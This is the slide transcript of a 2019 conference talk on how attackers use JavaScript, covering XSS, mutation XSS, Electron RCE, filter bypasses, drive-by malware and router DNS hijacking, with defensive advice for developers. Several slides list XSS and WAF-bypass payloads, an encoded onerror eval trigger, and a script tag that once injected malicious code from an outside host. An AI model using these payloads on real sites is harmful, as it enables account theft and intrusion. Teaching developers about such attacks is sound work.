Captain Marvellous JavaScript - JSFoo Coimbatore 2019

Captain Marvellous JavaScript - JSFoo Coimbatore 2019

This talk was presented at JSFoo Coimbatore 2019.

The talk primarily introduces the versatility of JS from an attacker point of view to developers. The talk covers examples of how JS can be used to detect vulnerabilities,
build payloads, reliably exploit software, infra and humans alike.

The talk covers the following areas from an offensive security point of view:
- Using Beef to extend XSS attacks
- Mutation XSS and the recently discovered Google XSS vector (why it worked)
- Server Side JS attacks and Remote Code executions
- JS and Desktop applications, code execution and vulnerabilities
- Breaking Filters and WAFs using altered representation of JS and its objects
- Malware and JS obfuscation
- Using JS to fuzz browsers and earn money
- Attacking network devices (home routers and switches) using JavaScript

7bc73a50756cb3cffce9380275319c41?s=128

riyazwalikar

July 05, 2019
Tweet

Transcript

  1. 1.

    CAPTAIN MARVELLOUS JAVASCRIPT A L O O K AT T

    H E V E R S AT I L I T Y O F J S A N D H OW H A C K E R S U S E I T
  2. 2.

    ABOUT ME? • Riyaz Walikar, Chief Hacker @Appsecco • Several

    years of security experience in breaking things (Offensive Security) • All kinds of things (applications/mobile/systems/networks/wireless/cloud) • Love to travel, do photography and stargaze • Comic nerd Appsecco – https://appsecco.com @appseccouk
  3. 3.

    WHAT IS THIS TALK ABOUT? • The versatility of JS

    and its application in unorthodox circumstances and in offensive use cases. • JavaScript is everywhere. As much as it is used to build stuff, several use cases exist where hackers use JS to break stuff as well. • We will look at examples from Computer Security where JS is used to detect vulnerabilities, build payloads, reliably exploit software, infra and humans alike. • This talk is meant to introduce the audience to the various applications of JS (or its variations) from an attacker point of view and provide real world examples while doing so Appsecco – https://appsecco.com @appseccouk
  4. 4.

    JAVASCRIPT AND XSS: IS THAT IT? I C O N

    F I R M E D W H E N YO U P R O M P T E D F O R A N A L E RT
  5. 6.

    WE ALL KNOW • XSS occurs when user controlled data

    is reflected back in the browser as-is and is then processed by the browser’s JS engine • This user controlled data when run in the browser’s JS engine will have the same capabilities as developer written JS Appsecco – https://appsecco.com @appseccouk
  6. 7.

    WHAT XSS IS CAPABLE OF @appseccouk How most developers see

    XSS How most attackers see XSS https://www.polygon.com/2017/5/17/15624888/guardians-of-the-galaxy-vol-2-mantis-wrong https://www.looper.com/63592/untold-truth-baby-groot/
  7. 8.

    WHAT CAN YOU DO WITH XSS? • XSS can be

    used to (not an exhaustive list) – Read and send session data elsewhere – Read secrets in the DOM – Redirect users to malware infested sites / pornographic content – Steal the system CPU time to mine bitcoins – Steal keyboard keys (credentials) – Browser exploitation and Remote Code Execution – Phishing attacks / Framing content – Hack into internal routers and update the DNS or gateway IP to steal all network traffic Appsecco – https://appsecco.com @appseccouk
  8. 9.

    I'VE GOT NO BEEF WITH YOU! • Automated Tool to

    work with XSS infected zombies (browsers) • Features of BeEF (Browser Exploitation Framework) – Browser and OS fingerprinting – User behavior fingerprinting and Social Engineering – Fake Flash Update to install rogue extension – Identify internal IP address – Port scanner, network map creation – Run Metasploit modules to perform exploitation – Tunnel traffic through the browser – Geolocation of the browser Appsecco – https://appsecco.com @appseccouk
  9. 10.
  10. 11.
  11. 13.

    MUTATION XSS N OT C A N C E R

    O U S B U T M O R E L I K E J E A N G R E Y
  12. 14.

    MUTATION WHAT? • First described by Mario Heiderich in 2013,

    is a technique that relies on Browser engines to mutate strings when placed inside an innerHTML context. • The earliest known example was by a researcher called Yosuke Hasegawa in IE’s innerHTML in 2007 • He noticed that in IE, an element’s attribute bled into the document when using Print Preview when the attribute contained backticks Appsecco – https://appsecco.com @appseccouk
  13. 15.

    • IN <img src="foo" alt="``onerror=alert(1)"/> • OUT <img alt=``onerror=alert(1) src="foo">

    Appsecco – https://appsecco.com @appseccouk https://tenor.com/view/what-thor-confused-chris-hemsworth-gif-13355644
  14. 16.

    MUTATION WHAT? • Basically, user controlled input is innocuous as

    it passes through server filters, client filters, WAF, browser protections etc. but is made malicious by the browser when injected into innerHTML • Over the years, multiple vectors have been discovered that can be used to trick browsers into rendering malicious content while passing through filters and protections as harmless strings Appsecco – https://appsecco.com @appseccouk
  15. 17.

    CS: THE GOOGLE XSS • Most attackers dream of getting

    an XSS on the Google home page via the search bar Appsecco – https://appsecco.com @appseccouk
  16. 18.

    CS: THE GOOGLE XSS BACKGROUND • On Sept 26 2018,

    a developer working on the Closure library created a commit that removed part of input sanitisation. The Google Search bar uses the Closure library • In Feb 2019, Masato Kinugawa discovered that this allowed a mutation to occur when a noscript tag was used with malformed HTML. The closure library would parse the input via template element and render it via div innerHTML • To understand this better, let’s take a look at how browsers mutate broken HTML Appsecco – https://appsecco.com @appseccouk
  17. 19.

    CS: THE GOOGLE XSS BROWSER MUTATIONS • Save this as

    a.html <div><script title="</div>"> • Save this as b.html <script><div title="</script>"> • Open both in Chrome and view the console for rendered source Appsecco – https://appsecco.com @appseccouk
  18. 21.

    CS: THE GOOGLE XSS THE NOSCRIPT TAG MUTATION • Closure

    library utilised the template tag to obtain safe HTML to be then passed to a div • The `template` element does not parse JS but a `div` does • If we pass a `<noscript>` tag containing a broken noscript tag and an xss vector, the noscript tag would be parsed by `template` and then `div` causing the xss to trigger Appsecco – https://appsecco.com @appseccouk
  19. 23.

    SERVER SIDE JS ATTACKS L E T ’ S G

    I V E J S F U L L A C C E S S TO S E RV E R R E S O U R C E S , S A I D N O O N E E V E R
  20. 24.

    “User supplied data should never be used inside an execution

    context without first checking if the data has any special meaning within that context” Appsecco – https://appsecco.com @appseccouk - Every programming language ever https://www.businessinsider.in/The-best-part-of-the-Captain-Marvel-trailer-has-now-become-a-hilarious-meme/articleshow/65875962.cms
  21. 25.

    THE PERILS OF SERVER SIDE USER CODE • Where is

    the data coming from? • Where will the data be processed? • Will the function processing the data validate if the data is benign within it’s context? • Server side processing has access to the OS and its resources • User supplied data may be able to traverse server side objects and reach functions that would otherwise remain hidden/protected Appsecco – https://appsecco.com @appseccouk
  22. 26.

    SERVER SIDE JS INJECTION SPOT THE BUG Appsecco – https://appsecco.com

    @appseccouk A Server Side JavaScript Injection occurs when user input is passed to a server function that performs a JS eval. This could be done through multiple JS functions like eval(), setTimeout(), setInterval() and Function()
  23. 27.

    DEMO: REMOTE CODE EXECUTION • Crudely written webservice (remember I’m

    not a dev ☺) • Try it out from here - https://github.com/appsecco/vulnerable- apps/tree/master/node-simple-rce • Has multiple routes that perform multiple functions • Written in nodejs (express) with MongoDB backend • Quick test cases to check if user input ends up in eval context – Math: 5-4 – JS objects: undefined, String – Response objects: res, resp, response, rs • Then load other modules using require and use res.send to receive Appsecco – https://appsecco.com @appseccouk
  24. 29.

    MIXING DESKTOP CLIENTS AND JAVASCRIPT (WCGW) • JavaScript is now

    on the Desktop via Electron • Electron = Chromium front-end + NodeJS backend = Pseudo Native Platform Agnostic App • A lot of commonly used applications have now been ported to Electron • So from an attacker point of view – You have an app running on your desktop – To which I can send input (via a message, network traffic, hosted content, shared file or any feature) – The app uses JS to parse user provided input – WCGW Appsecco – https://appsecco.com @appseccouk
  25. 30.

    SOME ELECTRON APPS • Visual Studio Code (FTW) • Slack

    • Skype • LosslessCut • Waiterio Restaurant POS • Microsoft Teams • Snipline • Windows 95 Appsecco – https://appsecco.com @appseccouk
  26. 32.

    CS: CODE EXECUTION USING JAVASCRIPT IN A DESKTOP APP •

    AttackSurfaceAnalyzer (ASA) is a tool that takes a snapshot of your system state before and after the installation of other software product(s) and displays changes to a number of key elements of the system attack surface • ASA uses Electron.NET which is a wrapper around a "normal" Electron application with an embedded ASP.NET Core application. Electron APIs are invoked using a Electron.NET IPC bridge from .NET • An RCE was discovered in ASA due to the infamous NodeIntegration flag being set to true • This allows a JavaScript payload to spawn up processes on the target Appsecco – https://appsecco.com @appseccouk
  27. 33.

    CS: CODE EXECUTION USING JAVASCRIPT IN A DESKTOP APP WHAT

    WAS THE ISSUE AND THE EXPLOIT? • NodeIntegration flag was set to true in WebPreferences.cs • Allows calling of other modules like process_wrap or child_process • An XSS can result in server side code execution Appsecco – https://appsecco.com @appseccouk
  28. 34.

    CS: CODE EXECUTION USING JAVASCRIPT IN A DESKTOP APP TRIGGERING

    THE PAYLOAD AND CODE EXEC • Using an encoder to convert to either base64 or charCode, the entire payload can be passed via an onerror trigger • <img src=x onerror=eval(encoded_payload)> Appsecco – https://appsecco.com @appseccouk
  29. 35.
  30. 36.

    CS: RCE VIA COMMAND LINE ARGS IN EXODUS WALLET •

    Electron was vulnerable to a Protocol Handler Vulnerability, affecting apps that use custom protocol handlers. • Assigned CVE-2018-1000006 • Basically, Electron apps designed to run on Windows that register themselves as the default handler for a protocol, like myapp://, are vulnerable • A ton of apps became vulnerable due to the way the protocol handler could be used to pass additional parameters to the chromium window running the app • Example of this bug in Exodus, a cryptocurrency wallet handler. Appsecco – https://appsecco.com @appseccouk
  31. 37.

    CS: RCE VIA COMMAND LINE ARGS IN EXODUS WALLET THE

    BUG • Exodus registers a protocol handler, exodus://, which when invoked would launch the app • Browsing to a page containing the following code would result in Exodus launching with the command line args provided @appseccouk Appsecco – https://appsecco.com
  32. 38.

    CS: RCE VIA COMMAND LINE ARGS IN EXODUS WALLET THE

    EXPLOIT • Using the list at https://peter.sh/experiments/chromium-command-line- switches/, a command line switch was identified that would allow custom program to be launched @appseccouk Appsecco – https://appsecco.com
  33. 39.

    CS: HTML INJECTION IN SIGNAL VIA REACT HANDLER • A

    Quoted reply on Signal led to evaluation of HTML content • Signal internally uses React to render UI elements in the Chromium window • Issue in how the renderText() function in Quote.tsx set the HTML in the window Appsecco – https://appsecco.com @appseccouk
  34. 40.

    CS: HTML INJECTION IN SIGNAL VIA REACT HANDLER THE EXPLOIT

    • As the exploit relies on the user quoting a message containing valid HTML, an attacker could send messages containing HTML elements rendered as literals • When this is quoted in a reply, the HTML could be made to become part of the window and an innerHTML could cause execution • No public PoC released, however a message such as follows would work in this context Appsecco – https://appsecco.com @appseccouk
  35. 41.

    BREAKING FILTERS AND WAFS? W H Y B L A

    C K L I S T S D O N ’ T M AT T E R
  36. 42.

    COMMON BYPASSES • JS objects, variables and functions can be

    represented in many forms • If the PoC is to generate an alert box, several different forms of calling the alert work • Depending on the filter being targeted, you need to analyse the output that is received for various mutations of the input • Primarily, the following forms of manipulations can be tried – Representing an object differently – Using encoding techniques – String and object manipulation to access functions and attributes – Relying on browser and JS engine implementations to transform innocuous objects Appsecco – https://appsecco.com @appseccouk
  37. 43.

    COMMON BYPASSES • Some of the more common representations and

    usage include the following cases – alert(/xss/) – eval("ale"+"rt(0)") – Function("aler"+"t(0)")() – onerror="alert;throw 1" – onerror=eval;throw'=confirm\x281\x29'; – javascript:\u0061lert&#x28;1&#x29 – <input onfocus=alert(document.cookie) autofocus> – eval(17795081..toString(36)+"(0)") – " onmouonmouseoverseover=alalertert(0) – self['\x61\x6c\x65\x72\x74']('\x58\x53\x53') Appsecco – https://appsecco.com @appseccouk
  38. 44.

    JS WEIRDNESS (FOR ATTACKERS) • JS can get real weird

    real quick for attackers and different representations can be used as attack payloads • It’s perfectly legal JS, but due to the representation itself it appears weird™ • Using an obscure form of JS representation called JsFuck, you can create objects, strings and other entities ready for execution without using strings or numbers • It uses only six different characters to write and execute code - ()+[]! Appsecco – https://appsecco.com @appseccouk
  39. 48.

    BREAKING FILTERS/WAFS • Depending on the context where reflection is

    occurring, different forms of input can be tried • For dynamic filters that strip away blacklisted words like onmouseover, onload etc. the following test cases can be applied – " onmouonmouseoverseover=alalertert(0 – <svg/onloloadad="al+"ert(0)"> – " ontouch=alert(0) • Some filters may not detect payloads sent using newline or whitespace characters – " name=test%0d%0a<script>alert(0)</script> • If the WAF/filter allows Unicode representation to pass through, you could use something like – xss\"\u003E\u003Ch1 onmous\u0045over=al\u0065r\u0074(domain)\u003EPayload\u003C/h1\u003E Appsecco – https://appsecco.com @appseccouk
  40. 49.

    MALWARE, JAVASCRIPT AND OBFUSCATION YO U W I L L

    N OT B E L I E V E W H AT H A P P E N E D N E X T
  41. 50.

    MALWARE AND THE INTERNET • Almost all modern malware infections,

    social engineering attempts, phishing and targeted ad campaigns are now delivered through the Internet • Attackers compromise high traffic website, inject malicious JavaScript as part of the page or add an iframe that redirects the user to a phishing site or simply prompts to download and run “antivirus software” • The compromise may have been done using a Stored XSS, a weak admin password, server side code execution vulnerability or due to the usage of a vulnerable library hosted on a CDN • Attackers also heavily rely on user’s browsing habits, clickbaity articles and user belief in phishing emails to achieve what is known as a “drive by download” attack Appsecco – https://appsecco.com @appseccouk
  42. 53.
  43. 54.
  44. 55.

    CS: DRIVE BY DOWNLOADS THE ATTACK CHAIN • User’s are

    tricked into navigating to a site laden with JS that profiles the browser, addons, the OS and other plugins that may be active (think Flash, Java, Silverlight (?)) • A legitimate site may also be affected with malicious JavaScript via a server side vulnerability or a compromised CDN • A weakness in the browser or third party components is exploited to download/run additional code without user interaction • The user may additionally/alternatively be phished to download and run a binary irrespective of a browser weakness • The binary when run natively on the machine, gives complete access to the attacker, allowing them to manage the machine remotely or add them to a larger bot network Appsecco – https://appsecco.com @appseccouk
  45. 56.

    CS: DRIVE BY DOWNLOADS AN EXAMPLE EXPLOIT – AOL SUPERBUDDY

    EXPLOIT • A legit site was infected with malicious JS via SQL Injection. The HTML code <script src="http://www.kjwd.ru/js.js"> was injected in all pages on the site • The script checks for a cookie to verify if the browser has been attacked before. If no cookie is found, a new cookie is set to mark the beginning of an exploit attempt • A new iframe is created using JS with 0 dimensions. This iframe loads another script from iroe.ru by using the User-Agent request-header field to detect the user’s browser and Operating System • Returned script uses obfuscation techniques and polymorphism to make analysis difficult • Uses location.href as a key to decode encoded strings which makes static analysis difficult Appsecco – https://appsecco.com @appseccouk
  46. 57.

    CS: DRIVE BY DOWNLOADS AN EXAMPLE EXPLOIT CONTD. • A

    sample of the partially deobfuscated code is shown below Appsecco – https://appsecco.com @appseccouk • The script attempts to execute 3 exploits in the if loop, targeting different vulnerabilities • Code creates an ActiveXObject from the AOL SuperBuddy plugin, if successful it executes Exhne69P • The function loads shellcode onto the browser’s heap through various string manipulations so that if the exploit is triggered, the execution will land in the loaded shellcode (heap-spray method) • Actual exploit is triggered by invoking the LinkSBIcons method with a large integer causing an overflow
  47. 58.

    USING JAVASCRIPT TO FUZZ BROWSERS N OW YO U S

    E E M E , N OW YO U D O N ’ T
  48. 59.

    BROWSER FUZZING? Appsecco – https://appsecco.com @appseccouk Create HTML pages containing

    JavaScript that creates and destroys and attempts to re- use destroyed elements from the DOM (example). Create several hundred/thousand mutations of these files as input to different browsers Attempt to load them in a browser attached to a debugger to monitor memory access and system usage Browser crash could mean access to a memory location or control of code flow due to the input HTML+JS page May potentially lead to an info leak or remote code execution or a vulnerability that could be further exploited Many different automated engines/tools available to fuzz browsers. Most of them being open source.
  49. 60.

    TOOLS, BROWSER CRASHES AND THE $$$ • Several popular tools

    like Domato, Grinder attempt to make Browser Fuzzing easier for even novices • Many researchers have written their own tools, scripts, debuggers and other automation around fuzzing browsers • Browser fuzzing and exploitation is a lucrative industry • Several companies buy exploits from researchers including browser vendors themselves • Events like Pwn2Own and other conferences provide cash prizes upwards of 40,000 USD to hackers who successfully hack major browsers • Browser vendors run Bug Bounty programs to safely patch vulnerabilities while paying researchers for their work and working exploits Appsecco – https://appsecco.com @appseccouk
  50. 61.
  51. 62.
  52. 63.

    ATTACKING NET WORK DEVICES USING JAVASCRIPT A D M I

    N A D M I N A N D F U N T H I N G S
  53. 64.

    TAKING OVER THE DNS OF A NETWORK – ATTACK SCENARIO

    • A user browses to a website using a browser like Chrome or Firefox • The browser loads a piece of JavaScript that uses WebRTC to compute the internal IP address of the machine • This IP is passed to another function that uses it to create the presumed Gateway address and load an image • The image load URL has the default credentials passed via the URL resulting Basic Auth to go through • On successful load of the image, additional functions are called to set the internal DNS of the router and to make the admin console public Appsecco – https://appsecco.com @appseccouk
  54. 65.

    TAKING OVER THE DNS OF A NETWORK – CODE SNIPPET

    • A simple HTML Page example Appsecco – https://appsecco.com @appseccouk
  55. 66.

    TAKING OVER THE DNS OF A NETWORK – CODE SNIPPET

    • The bodyOnLoad function to retrieve the internal IP using WebRTC Appsecco – https://appsecco.com @appseccouk
  56. 67.

    TAKING OVER THE DNS OF A NETWORK – ATTACK SCENARIO

    • The bodyOnLoad function to retrieve the internal IP using WebRTC Appsecco – https://appsecco.com @appseccouk
  57. 68.

    WHAT COULD GO WRONG FROM HERE • Active and Passive

    Man-in-the-Middle attacks • Phishing attacks to steal credentials by loading attacker controlled domains • Botched program updates received from malicious domains allow direct compromise of the victim system(s) • Attacker has essentially full visibility and control of the target network Appsecco – https://appsecco.com @appseccouk
  58. 70.

    TO CLOSE • JS is not only used to build

    stuff but actively used by attackers to do all sorts of cool things • Do not trust user input, anytime, anywhere • Patch your browsers, update your apps • Change default credentials, everywhere • Be wary of the sites you visit, the links you click and the attachments you open • There is no Nigerian prince who wants to give you money
  59. 71.
  60. 72.

    REFERENCES • https://github.com/beefproject/beef/wiki • https://cure53.de/fp170.pdf • https://www.youtube.com/watch?v=lG7U3fuNw3A • https://github.com/appsecco/dvna •

    https://parsiya.net/blog/2019-06-18-chaining-three-bugs-to-get-rce-in-microsoft-attacksurfaceanalyzer/#vuln-3-xss-to-rce-via- nodeintegration • https://hackernoon.com/exploiting-electron-rce-in-exodus-wallet-d9e6db13c374 • https://thehackerblog.com/i-too-like-to-live-dangerously-accidentally-finding-rce-in-signal-desktop-via-html-injection-in-quoted- replies/ • https://github.com/EdOverflow/bugbounty-cheatsheet/blob/master/cheatsheets/xss.md • https://gist.github.com/xsscx/0e55b25f6b959bf572a9 • https://support.google.com/webmasters/answer/3024344?hl=en • https://sites.cs.ucsb.edu/~vigna/publications/2010_cova_kruegel_vigna_Wepawet.pdf • https://blog.sucuri.net/2017/12/javascript-injection-creates-rogue-wordpress-admin-user.html • https://github.com/Escapingbug/awesome-browser-exploit • https://www.pentestpartners.com/security-blog/lan-surfing-how-to-use-javascript-to-execute-arbitrary-code-on-routers/ • https://www.spamfighter.com/News-20220-Malware-Based-on-JavaScript-Attacks-DNS-Settings-of-Your-Router.htm • https://blog.trendmicro.com/trendlabs-security-intelligence/mobile-devices-used-to-execute-dns-malware-against-home- routers/
  61. 73.

    THANK YOU! • Riyaz AhemedWalikar • @riyazwalikar • @appseccouk •

    https://blog.appsecco.com • https://appsecco.com • https://ibreak.software